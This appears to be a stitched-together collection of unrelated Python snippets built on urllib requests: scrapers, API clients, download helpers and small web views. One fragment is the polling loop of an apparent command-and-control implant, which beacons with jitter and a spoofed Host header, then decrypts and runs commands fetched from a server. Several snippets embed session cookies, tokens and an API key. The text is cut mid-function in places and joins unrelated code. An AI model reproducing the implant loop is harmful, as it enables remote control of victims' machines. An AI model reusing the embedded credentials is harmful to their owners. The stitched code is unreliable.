from flask import Flask, render_template from urllib import request, parse import json import time base_url = 'https://api.forismatic.com/api/1.0/' parameters = [('method', 'getQuote'), ('format', 'json'), ('lang', 'en')] request_url = base_url + '?' + parse.urlencode(parameters) request_format = request.Request(request_url) request_format.add_header('User-Agent', 'quotedaily') # create the application object app = Flask(__name__) # use decorators to link the function to a url @app.route('/') def home(): if time.localtime().tm_hour == 15: new_quote() quote = get_quote() return render_template('index.html', quote=quote[0]) def new_quote(): url = request.urlopen(request_format).read() data = json.loads(url) with open('quote.json', 'w') as f: json.dump(data, f)
def url_save_chunked(url, filepath, bar, refer=None, is_part=False, faker=False): if os.path.exists(filepath): if not force: if not is_part: if bar: bar.done() print('Skipping %s: file already exists' % tr(os.path.basename(filepath))) else: if bar: bar.update_received(os.path.getsize(filepath)) return else: if not is_part: if bar: bar.done() print('Overwriting %s' % tr(os.path.basename(filepath)), '...') elif not os.path.exists(os.path.dirname(filepath)): os.mkdir(os.path.dirname(filepath)) temp_filepath = filepath + '.download' received = 0 if not force: open_mode = 'ab' if os.path.exists(temp_filepath): received += os.path.getsize(temp_filepath) if bar: bar.update_received(os.path.getsize(temp_filepath)) else: open_mode = 'wb' if faker: headers = fake_headers else: headers = {} if received: headers['Range'] = 'bytes=' + str(received) + '-' if refer: headers['Referer'] = refer response = request.urlopen(request.Request(url, headers=headers), None) with open(temp_filepath, open_mode) as output: while True: buffer = response.read(1024 * 256) if not buffer: break output.write(buffer) received += len(buffer) if bar: bar.update_received(len(buffer)) assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % ( received, os.path.getsize(temp_filepath)) if os.access(filepath, os.W_OK): os.remove( filepath ) # on Windows rename could fail if destination filepath exists os.rename(temp_filepath, filepath)
from urllib import request, parse values = "username:'******'123456" data = values.encode(encoding="gb2312") url = 'https://music.163.com/#/song?id=869785' my_request = request.Request(url, data) respense = request.urlopen(my_request) print(respense.read())
while 1: JiCi += 1 YouBiao.execute("select URL from URL_Ji1 where ID=" + str(JiCi)) url = YouBiao.fetchone() if url != None: url = url[0] else: break try: #提取链接 if re.search(r"DirectLink.direct", url) != None: pmbh = re.findall(r"sp=S?(\w+)&", url)[1] url2 = "http://www.hngp.gov.cn/wsscnew/egp/jy/xyghjy/xyghxm/xyghzy/xzsp/XyspList.html?pmbh=" + pmbh + "&cgsl=0&cgje=0.0&ppbh=null&lastcgsl=0&lastcgje=0.0&xmxh=null&xyghbh=null&isnwwbz=ww&area=00390019&czy=null&lbbs=null" url2 = quote(url2, '\/:?=;@&+$,%.#\n') Request2 = request.Request(url=url2, headers=header1) try: DaKai_url2 = request.urlopen(Request2) except: try: DaKai_url2 = request.urlopen(Request2) except: print("打开链接" + url + "超时!略过此链接!") RiZhiChuLi(2, url, pmbh, url2, None) continue BeautifulSoup2 = BeautifulSoup(DaKai_url2, "html.parser", from_encoding="utf-8") #列表页处理 YeShu = BeautifulSoup2.find("span", style="float:right").get_text() YeShu = re.findall(r"共(\d+)页", YeShu)[0]
# 1.日本 # proxy = {'http': '140.227.65.196:3128'} # 2.俄罗斯 proxy = {'http': '94.242.59.135:1448'} # 2.创建ProxyHandler proxy_handler = request.ProxyHandler(proxy) # 3.创建Opener opener = request.build_opener(proxy_handler) # 4.安装Opener request.install_opener(opener) # 下面再进行访问url就会使用代理服务器 # 更换浏览器型号,参照:https://www.cnblogs.com/xpwi/p/9600719.html try: req = request.Request(url) req.add_header( "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163" ) rsp = request.urlopen(req) html = rsp.read().decode() print("访问成功访客+1,以下是该网页的HTML:\n", html, "\n访问成功访客+1,以上是该网页的HTML\n") except error.HTTPError as e: print(e) except Exception as e: print(e)
################################################### print('============= GET =============') with request.urlopen('https://www.baidu.com') as f: data = f.read() print('Status:', f.status, f.reason) for k, v in f.getheaders(): print(' %s: %s' % (k, v)) print('Data: ', data.decode('utf-8')) ################################################### # 添加头部 ################################################### print('============= 添加头部 =============') req = request.Request('http://www.baidu.com') req.add_header( 'User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25' ) with request.urlopen(req) as f: data = f.read() print('Status:', f.status, f.reason) for k, v in f.getheaders(): print(' %s: %s' % (k, v)) print('Data: ', data.decode('utf-8')) ################################################### # Post ################################################### print('============= POST =============')
agent3 = "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36" agent4 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" agent5 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" list1 = [agent1, agent2, agent3, agent4, agent5] agent = random.choice(list1) #构造请求头信息 header = { "User-Agent": agent, "Cookie": "__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s%3AdBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773" } titlelist = [] jianjielist = [] ulist = [] for i in urllist: req = request.Request(i, headers=header) reponse1 = request.urlopen(req).read().decode() data1 = re.findall( r'"topicTotalNum":\d+,"title":"(.{0,50}?)","columnType":\d+,"authorId":', reponse1) #data2=re.findall(r'"columnList":.*?"_id":"(.*?)"',reponse1) data3 = re.findall( r'"columnTopics":.*?([(0-9)(a-z)(A-Z)]{24}).*?,"status"', reponse1) print(data3)
def intormation_book(request, pagesize=24, pageno=1): try: try: if bool(request.GET['bool']) == True: pageno = int(request.GET['next_number']) pageno += int(request.GET['next']) except: pass try: if bool(request.GET['bool-back']) == True: pageno = int(request.GET['back_number']) pageno -= int(request.GET['back-up']) except: pass try: if pageno > int(request.GET['page_total']): pageno = int(request.GET['page_total']) except: pass informa_book_url = f'https://m.ebookservice.tw/api/3.00/ks/BookList/?pageSize=24&pageNo={pageno}&classification=TCL144&keyword=' requests = req.Request( informa_book_url, headers={ 'cookie': 'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36', }) with req.urlopen(requests) as response: data = response.read().decode('utf8') data = json.loads(data) page_total = data['TotalRecordCount'] datas = data['List'] book_ID_dic = {} for date in datas: book_flash = {} book_ID = date['TinyBook']['BookId'] book_contents = hot_book_total_url(book_ID) book_contents = read_hotbook_total_url(book_contents) book_flash.setdefault('book_img_url', hot_book_img(book_ID)) #圖片網址 book_flash.setdefault('TitleCache', book_contents['TitleCache']) #標題 book_flash.setdefault('Author', book_contents['Author']) #作者 book_flash.setdefault('PublisherName', book_contents['PublisherName']) # 出版社 book_flash.setdefault('TotalPage', book_contents['TotalPage']) #總頁數 book_flash.setdefault('UpdateDate', book_contents['UpdateDate']) #上傳時間 book_flash.setdefault('Description', book_contents['Description']) #描述 book_flash.setdefault('ISBN', book_contents['ISBN']) # 書本編號 book_ID_dic.setdefault(book_ID, book_flash) return render(request, 'information-book.html', { 'book_ID_dic': book_ID_dic, 'pageno': pageno, 'page_total': page_total }) except: return render(request, 'information-book.html', {'date_time': "錯誤"})
def hot_book(request, date_time=time.strftime(f'%Y/%m/%d', time.localtime()), book_number=1): try: try: book_number = request.GET['book_searcg'] except: pass if time.strptime(date_time, f"%Y/%m/%d"): hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate={date_time}&endDate={date_time}%2023:59:59&type=book&takeSize={book_number}' # hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate=2020/11/5&endDate=2020/11/5%2023:59:59&type=book&takeSize={book_number}' requests = req.Request( hot_book_url, headers={ 'cookie': 'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36', }) with req.urlopen(requests) as response: data = response.read().decode('utf8') datas = json.loads(data) datas = datas['List'] book_ID_dic = {} # book_url_list= [] for date in datas: book_flash = {} book_ID = date['TinyBook']['BookId'] book_contents = hot_book_total_url(book_ID) book_contents = read_hotbook_total_url(book_contents) book_flash.setdefault('book_img_url', hot_book_img(book_ID)) #圖片網址 book_flash.setdefault('TitleCache', book_contents['TitleCache']) #標題 book_flash.setdefault('Author', book_contents['Author']) #作者 book_flash.setdefault('PublisherName', book_contents['PublisherName']) # 出版社 book_flash.setdefault('TotalPage', book_contents['TotalPage']) #總頁數 book_flash.setdefault('UpdateDate', book_contents['UpdateDate']) #上傳時間 book_flash.setdefault('Description', book_contents['Description']) #描述 book_flash.setdefault('ISBN', book_contents['ISBN']) # 書本編號 book_ID_dic.setdefault( book_ID, book_flash ) # {ID:[img_url,TitleCache標題,Author作者,PublisherName出版社,TotalPage總頁數,UpdateDate上傳時間,Description描述,ISBN書本編號]} # book_url_list.append(hot_book_img(book_ID)) 'book_url_list':book_url_list #GET圖片網址 return render( request, 'hot-book.html', { 'date_time': date_time, 'book_number': book_number, 'book_ID_dic': book_ID_dic }) except: return render(request, 'hot-book.html', {'date_time': "錯誤"})
headers = { "accept-encoding": "gzip, deflate", # auto delete br encoding. cos requests and scrapy can not decode it. "accept-language": "zh-CN,zh;q=0.9", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36" } return url, headers method = 'GET' url, headers = mk_url_headers() body = None r = request.Request(url, method=method) for k, v in headers.items(): if k.lower() == 'accept-encoding': continue # urllib并不自动解压缩编码,所以忽略该headers字段 r.add_header(k, v) s = request.urlopen(r) print(url) content = s.read() parser = Vparser() print('start') v = VHTML(content.decode()) for i in v.xpath('//a/@href'): print(i) print('---- split ----') for i in v.xpath('//div/div/span[1][@class="wetSource"]/text()'):
def loadpage(fullurl, filename): print("正在下载:", filename) req = request.Request(fullurl, headers=header) resp = request.urlopen(req).read() return resp
def fetch(self, url, method='GET', headers=None, body=None): """Perform a HTTP request and return decoded JSON data""" headers = headers or {} if self.userAgent: if type(self.userAgent) is str: headers.update({'User-Agent': self.userAgent}) elif (type(self.userAgent) is dict) and ('User-Agent' in self.userAgent): headers.update(self.userAgent) if len(self.proxy): headers.update({'Origin': '*'}) headers.update({'Accept-Encoding': 'gzip, deflate'}) url = self.proxy + url if self.verbose: print(url, method, url, "\nRequest:", headers, body) if body: body = body.encode() request = _urllib.Request(url, body, headers) request.get_method = lambda: method response = None text = None try: # send request and load response handler = _urllib.HTTPHandler if url.startswith( 'http://') else _urllib.HTTPSHandler opener = _urllib.build_opener(handler) response = opener.open(request, timeout=int(self.timeout / 1000)) text = response.read() except socket.timeout as e: raise RequestTimeout(' '.join( [self.id, method, url, 'request timeout'])) except ssl.SSLError as e: self.raise_error(ExchangeNotAvailable, url, method, e) except _urllib.HTTPError as e: error = None details = text if text else None if e.code == 429: error = DDoSProtection elif e.code in [404, 409, 500, 501, 502, 521, 522, 525]: details = e.read().decode('utf-8', 'ignore') if e else None error = ExchangeNotAvailable elif e.code in [400, 403, 405, 503]: # special case to detect ddos protection reason = e.read().decode('utf-8', 'ignore') ddos_protection = re.search('(cloudflare|incapsula)', reason, flags=re.IGNORECASE) if ddos_protection: error = DDoSProtection else: error = ExchangeNotAvailable details = '(possible reasons: ' + ', '.join([ 'invalid API keys', 'bad or old nonce', 'exchange is down or offline', 'on maintenance', 'DDoS protection', 'rate-limiting', reason, ]) + ')' elif e.code in [408, 504]: error = RequestTimeout elif e.code in [401, 422, 511]: error = AuthenticationError self.raise_error(error, url, method, e, details) except _urllib.URLError as e: self.raise_error(ExchangeNotAvailable, url, method, e) encoding = response.info().get('Content-Encoding') if encoding in ('gzip', 'x-gzip', 'deflate'): if encoding == 'deflate': text = zlib.decompress(text, -zlib.MAX_WBITS) else: data = gzip.GzipFile('', 'rb', 9, io.BytesIO(text)) text = data.read() body = text.decode('utf-8') if self.verbose: print(method, url, "\nResponse:", headers, body) return self.handle_response(url, method, headers, body)
def __execute(self, http_method, url, basic_auth, query_params, post_params): passwords = [] if len(url) == 0: raise SystemError('url required') if len(query_params) > 0: url += '?' + parse.urlencode(query_params) if post_params == None: request_body = '' else: request_body = json.dumps(post_params) request_body = request_body.encode(self.char_code) http_header = { 'Content-Type': self.CONTENT_TYPE, 'Content-Length': str(len(request_body)) } if len(basic_auth) > 0: passwords.append(basic_auth['pass']) authorization = basic_auth['id'] + ':' + basic_auth['pass'] http_header['Authorization'] = 'Basic ' + base64.b64encode( authorization.encode(self.char_code)).decode('ascii') # Output Log(MSA Request) log_msg = '[MSA Request]' log_msg += '[METHOD]' + http_method log_msg += '[URL]' + url log_msg += '[HEADER]' + json.dumps(http_header) log_msg += '[PARAMS]' + json.dumps(post_params) self.logger.log_info(__name__, log_msg, passwords) req = request.Request(url, headers=http_header, data=request_body) req.method = http_method with request.urlopen(req) as res: response_params = res.read().decode(self.char_code) # Output Log(MSA Response) log_msg = '[NSA Response]' log_msg += '[STATUS]' + str(res.getcode()) log_msg += '[HEADER]' + str(res.headers) log_msg += '[PARAMS]' + response_params self.logger.log_info(__name__, log_msg, passwords) if len(response_params) > 0: try: response_params = json.loads(response_params) except json.decoder.JSONDecodeError: raise SystemError(response_params) except: raise return response_params
def saveResult(self, run, task): taskKey = task['key'] log_file = run['logFile'] headers = {'Accept':'text/plain'} fileNames = [] for file in task['files']: fileNames.append(file['name']) try: util.write_file(json.dumps(task), log_file+'.stdOut') except: logging.debug('Could not save task '+taskKey) statisticsProcessed = False if APPENGINE_SETTINGS['statisticsFileName'] in fileNames: try: uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['statisticsFileName'] request = urllib2.Request(uri, headers=headers) response = urllib2.urlopen(request).read().decode() util.write_file(response, log_file) statisticsProcessed = True except: statisticsProcessed = False logging.exception('Could not save statistics of'+taskKey) else: statisticsProcessed = True if APPENGINE_SETTINGS['errorFileName'] in fileNames: try: uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['errorFileName'] request = urllib2.Request(uri, headers=headers) response = urllib2.urlopen(request).read().decode() response = 'Task Key: {}\n{}'.format(task['key'], response) util.write_file(response, log_file+'.stdErr') except: logging.exception('Error while retrieving result file for '+taskKey) headers = {'Content-type':'application/json', 'Accept':'application/json'} markedAsProcessed = False if statisticsProcessed: try: uri = self.benchmark.config.appengineURI+'/tasksets/'+self.tasksetKey+'/tasks' request = urllib2.Request(uri, json.dumps([taskKey]).encode(), headers=headers) request.get_method = lambda: 'PUT' urllib2.urlopen(request) self.finishedTasks += 1 markedAsProcessed = True logging.info('Stored result of task {0} in file {1}'.format(taskKey, log_file)) try: with open(self.benchmark.output_base_name+'.Processed_Tasks.txt', 'a') as f: f.write(taskKey+'\n') except: pass logging.debug('Task {} finished. Status: {}'.format(taskKey, task['status'])) except: logging.debug('The task {} could not be marked as processed.'.format(taskKey)) if self.benchmark.config.appengineDeleteWhenDone and markedAsProcessed: try: uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey request = urllib2.Request(uri, headers=headers) request.get_method = lambda: 'DELETE' urllib2.urlopen(request).read() except: logging.exception('The task {} could not be deleted.'.format(taskKey))
infile = StringIO.StringIO(data[16:]) with gzip.GzipFile(fileobj=infile, mode="r") as f: data = f.read() return data while(True): cstr=time.strftime("%%Y-%%m-%%d",time.gmtime());cstr=time.strptime(cstr,"%%Y-%%m-%%d") if cstr < kd: key = "%s" uri = "%s" server = "%%s/%%s%%s" %% (serverclean[0], random.choice(urls), uri) try: this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter)) time.sleep(this_timer) ua='%s' if hh[0]: req=urllib2.Request(server,headers={'Host':hh[0],'User-agent':ua}) else: req=urllib2.Request(server,headers={'User-agent':ua}) res=urllib2.urlopen(req) html = res.read().decode("utf-8") except Exception as e: print("error %%s" %% e) if html: try: returncmd = decrypt(key, html) returncmd = returncmd.rstrip('\\0') returncmd = base64.b64decode(returncmd).decode("utf-8") if "multicmd" in returncmd: returncmd = returncmd.replace("multicmd","") returnval = "" splits = returncmd.split("!d-3dion@LD!-d")
from urllib import request, parse req = request.Request('http://www.baidu.com') # 加入协议头, 模仿浏览器浏览网页 req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.9.3.1000 Chrome/39.0.2146.0 Safari/537.36') resp = request.urlopen(req) print(resp) print(help(request.urlopen)) print('________________________________________________________________________________')
""" turns an int into a human reable byte size without the need of an external module found there : http://code.activestate.com/recipes/577081-humanized-representation-of-a-number-of-bytes/ """ suffixes = ['B', 'KB', 'MB', 'GB', 'TB'] suffixIndex = 0 while size > 1024: suffixIndex += 1 #increment the index of the suffix size = size / 1024.0 #apply the division return '{0:.{1}f} {2}'.format(size, precision, suffixes[suffixIndex]) print('Connecting to ebi public FTP server...') ## get ml_file_extensions via http study_url = 'http://ftp.ebi.ac.uk/pub/databases/metabolights/study_file_extensions/ml_file_extension.json' req = rq.Request(study_url) con = rq.urlopen(req) ## get studies containing mzML e = json.JSONDecoder() study = e.decode(con.read().decode('utf-8')) mzml_studies = [k['id'] for k in study if '.mzML' in k['extensions']] ## create output folder if not os.path.isdir('example_files/metabolights'): os.mkdir('example_files/metabolights') os.chdir('example_files/metabolights') ## start ftp session ftp = ftplib.FTP('ftp.ebi.ac.uk') ftp.login()
from urllib import request req = request.Request('http://www.douban.com') req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') with request.urlopen(req) as f: print('Status:', f.status, f.reason) for k, v in f.getheaders(): print('%s: %s' % (k, v)) print('Data:', f.read().decode('utf-8'))
import urllib.request as req import matplotlib.pyplot as plt def inputstock(url): url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2" url = "https://histock.tw/stock/financial.aspx?no=2887&t=2" #附加headers 偽裝一般使用者 request = req.Request( url, headers={ "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" }) with req.urlopen(request) as response: data = response.read().decode("utf-8") # print(data) #解析原始碼 import bs4 root = bs4.BeautifulSoup(data, "html.parser") EPS_5Y = [] def inputstock(url): url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
def mesaj_gonder(isim, mesaj): data = json.dumps({"message":mesaj, "sender":isim}).encode() rq = request.Request(url, data, headers={'content-type': 'application/json'}) response = request.urlopen(rq) return json.loads(response.read().decode())
#!/usr/bin/env python # coding:utf-8 from urllib import request with request.urlopen('http://news-at.zhihu.com/api/4/news/latest') as f: # Zhihu Daily newest feed API data = f.read() print('Status:', f.status, f.reason) print() for k, v in f.getheaders(): print('{0}: {1}'.format(k, v)) print("################################################################") print('Data:', data.decode('utf-8')) print("################################################################") req = request.Request('http://daily.zhihu.com/') # Zhihu Daily frontpage req.add_header( 'User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25' ) # add header; request for iPhone version page with request.urlopen(req) as f: print('Status:', f.status, f.reason) for k, v in f.getheaders(): print('{0}: {1}'.format(k, v)) print("################################################################") print('Data:', f.read().decode('utf-8'))
def GetScenes(): req = urllib2.Request('http://localhost:8080/json.htm?type=scenes') resp = rullib2.urlopen(req) data = resp.read() data = json.loads(data) return data
from urllib import request url = "http://www.baidu.com" #添加header信息反扒措施 header = { "User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" } req = request.Request(url,headers=header) res = request.urlopen(req) html = res.read(); html = str(html,encoding='utf-8') print(str(html))
def index(request, lang="EN"): #template = loader.get_template('cv_parser/index.html') language = "Français" language_code = "fr" languages = {'language': 'English', 'code': 'us', 'link': 'EN'} if lang == "FR": with open("cv_parser/fr.json", 'r') as config: json_config = json.loads(config.read()) config.close() elif lang == "EN": language = "English" languages = {'language': 'Français', 'code': 'fr', 'link': 'FR'} language_code = "us" with open("cv_parser/en.json", 'r') as config: json_config = json.loads(config.read()) config.close() else: with open("cv_parser/fr.json", 'r') as config: json_config = json.loads(config.read()) config.close() #with open("cv_parser/cache.json","r") as cache_file: # json_cache=json.loads(cache_file.read()) # cache_file.close() #hash_of_adress = json_config["contact"]["adress"].encode("utf-8") #hash_of_adress = hashlib.md5(hash_of_adress).hexdigest() #if json_cache["adress"] != hash_of_adress: try: cmap = CenterMap(address=json_config["contact"]["adress"], zoom=15, key="AIzaSyCKM9tkv_Rc9fMhuwLhwNwvW8C9Y6hNuNg=") requ = req.Request(cmap.generate_url()) pic = req.urlopen(requ) filePath = 'cv_parser/static/cv_parser/images/static_map.png' with open(filePath, 'wb') as localFile: localFile.write(pic.read()) #json_cache["adress"] = hash_of_adress #with open("cv_parser/cache.json","w") as cache_file: # json.dump(json_cache, cache_file) # cache_file.close() except: print( "Error getting map image , put it manually in cv_parser/static/cv_parser/images/static_map.png" ) #hash_of_config = json.dumps(json_config, sort_keys = True).encode("utf-8") #hash_of_config = hashlib.md5(hash_of_config).hexdigest() #logger.info(json_cache[lang.lower()+"_pdf_hash"]) #logger.info(hash_of_config) #if json_cache[lang.lower()+"_pdf_hash"] != hash_of_config: template.create_template(json_config) #logger.info("new json") #json_cache[lang.lower()+"_pdf_hash"] = hash_of_config #with open("cv_parser/cache.json","w") as cache_file: # json.dump(json_cache, cache_file) # cache_file.close() # urllib.urlretrieve(self.url, filePath) return render( request, 'cv_parser/index.html', { 'config': json_config, 'language': language, 'language_code': language_code, 'languages': languages })
def url_save(url, filepath, bar, refer=None, is_part=False, faker=False): file_size = url_size(url, faker=faker) if os.path.exists(filepath): if not force and file_size == os.path.getsize(filepath): if not is_part: if bar: bar.done() print('Skipping %s: file already exists' % tr(os.path.basename(filepath))) else: if bar: bar.update_received(file_size) return else: if not is_part: if bar: bar.done() print('Overwriting %s' % tr(os.path.basename(filepath)), '...') elif not os.path.exists(os.path.dirname(filepath)): os.mkdir(os.path.dirname(filepath)) temp_filepath = filepath + '.download' received = 0 if not force: open_mode = 'ab' if os.path.exists(temp_filepath): received += os.path.getsize(temp_filepath) if bar: bar.update_received(os.path.getsize(temp_filepath)) else: open_mode = 'wb' if received < file_size: if faker: headers = fake_headers else: headers = {} if received: headers['Range'] = 'bytes=' + str(received) + '-' if refer: headers['Referer'] = refer response = request.urlopen(request.Request(url, headers=headers), None) try: range_start = int(response.headers['content-range'][6:].split('/') [0].split('-')[0]) end_length = end = int( response.headers['content-range'][6:].split('/')[1]) range_length = end_length - range_start except: range_length = int(response.headers['content-length']) if file_size != received + range_length: received = 0 if bar: bar.received = 0 open_mode = 'wb' with open(temp_filepath, open_mode) as output: while True: buffer = response.read(1024 * 256) if not buffer: if received == file_size: # Download finished break else: # Unexpected termination. Retry request headers['Range'] = 'bytes=' + str(received) + '-' response = request.urlopen( request.Request(url, headers=headers), None) output.write(buffer) received += len(buffer) if bar: bar.update_received(len(buffer)) assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % ( received, os.path.getsize(temp_filepath), temp_filepath) if os.access(filepath, os.W_OK): os.remove( filepath ) # on Windows rename could fail if destination filepath exists os.rename(temp_filepath, filepath)
header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36' } url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule' #post请求需要提交的参数 formdata = { 'i': key, 'from': 'AUTO', 'to': 'AUTO', 'smartresult': 'dict', 'client': 'fanyideskweb', 'salt': '15814112793734', 'sign': 'b54a57150836a4b5aede88441e12a9c1', 'ts': '1581411279373', 'bv': '37074a7035f34bfbf10d32bb8587564a', 'doctype': 'json', 'version': '2.1', 'keyfrom': 'fanyi.web', 'action': 'FY_BY_REALTlME' } #转成Url编码 data = urllib.parse.urlencode(formdata).encode(encoding='utf-8') #请求中有data参数为post请求,没有则是get请求 req = request.Request(url, data=data, headers=header) response = request.urlopen(req).read().decode() #提取"tgt":"和"}]]中间的任意内容 pat = r'"tgt":"(.*?)"}]]' result = re.findall(pat, response) print(result[0])
#!/usr/bin/python3 """ a Python script that takes in a URL and an email, sends a POST request to the passed URL with the email as a parameter, and displays the body of the response """ if __name__ == '__main__': from sys import argv from urllib import request, parse value = {'email': argv[2]} data1 = parse.urlencode(value) data = data1.encode("utf-8") req = request.Request(argv[1], data) with request.urlopen(req) as response: content = response.read() print(content.decode("UTF-8"))
def scrapeCompanyReviews(url, fileName): # list of reviews text = [] header = [] job_title = [] currentFormer = [] location = [] date = [] stars = [] # whether to go to next page of reviews bool = True # current index of review start = 0 while (bool): # get HTML req = lib.Request(url + '?start=' + str(start), headers={'User-Agent': 'Mozilla/5.0'}) webpage = lib.urlopen(req) soup = BeautifulSoup(webpage, 'html.parser') # find reviews current_text = soup.find_all('span', attrs={ 'class': 'cmp-review-text', 'itemprop': 'reviewBody' }) current_header = soup.find_all('div', attrs={'class': 'cmp-review-title'}) current_job_title = soup.find_all('span', attrs={'class': 'cmp-reviewer'}) current_location = soup.find_all( 'span', attrs={'class': 'cmp-reviewer-job-location'}) if (len(current_location) != len(current_header)): if (len(current_header) == 21): start += 20 continue else: bool = False continue current_date = soup.find_all( 'span', attrs={'class': 'cmp-review-date-created'}) current_stars1 = soup.find_all('span', attrs={'class': 'cmp-Rating-on'}) if (len(current_stars1) == 127): continue current_stars2 = [ current_stars1[i] for i in range(len(current_stars1)) if i % 6 == 1 ][:-1] current_stars = [ str(int(i['style'][7:-4]) / 20) for i in current_stars2 ] current_currentFormer = soup.find_all( 'span', attrs={'class': 'cmp-reviewer-job-title'}) current_currentFormer = [ re.search('\(([^)]+)', i.text).group(1) for i in current_currentFormer ] current_currentFormer = [ int(i == 'Current Employee') for i in current_currentFormer ] if (len(current_text) != len(current_stars) != len(current_location)): print(start) print([i.text.strip()[:10] for i in current_text]) print(len(current_stars1)) print(len(current_stars2)) print(current_stars) print(current_location) if (len(current_text) != 21): bool = False # if second or more page, remove first review if (start != 0 and len(current_text) != 0): current_text.pop(0) current_header.pop(0) current_job_title.pop(0) current_location.pop(0) current_date.pop(0) current_stars.pop(0) current_currentFormer.pop(0) if (len(current_text) != len(current_stars) != len(current_location)): print(start) print([i.text.strip()[:10] for i in current_text]) print(current_stars) print(current_location) # index to next page start += 20 # add text to list for i in current_text: text.append(i.text.strip().encode('ascii', errors='ignore').decode()) # add headers to list for i in current_header: header.append(i.text.strip().encode('ascii', errors='ignore').decode()) # add job titles to list for i in current_job_title: job_title.append(i.text.strip().encode('ascii', errors='ignore').decode()) # add locations to list for i in current_location: location.append(i.text.strip().encode('ascii', errors='ignore').decode()) # add dates to list for i in current_date: date.append(i.text.strip().encode('ascii', errors='ignore').decode()) # add stars to list for i in current_stars: stars.append(i) # add stars to list for i in current_currentFormer: currentFormer.append(i) with open(fileName, 'a', newline='') as csv_file: writer = csv.writer(csv_file) writer.writerow([ "company", "date", "job_title", 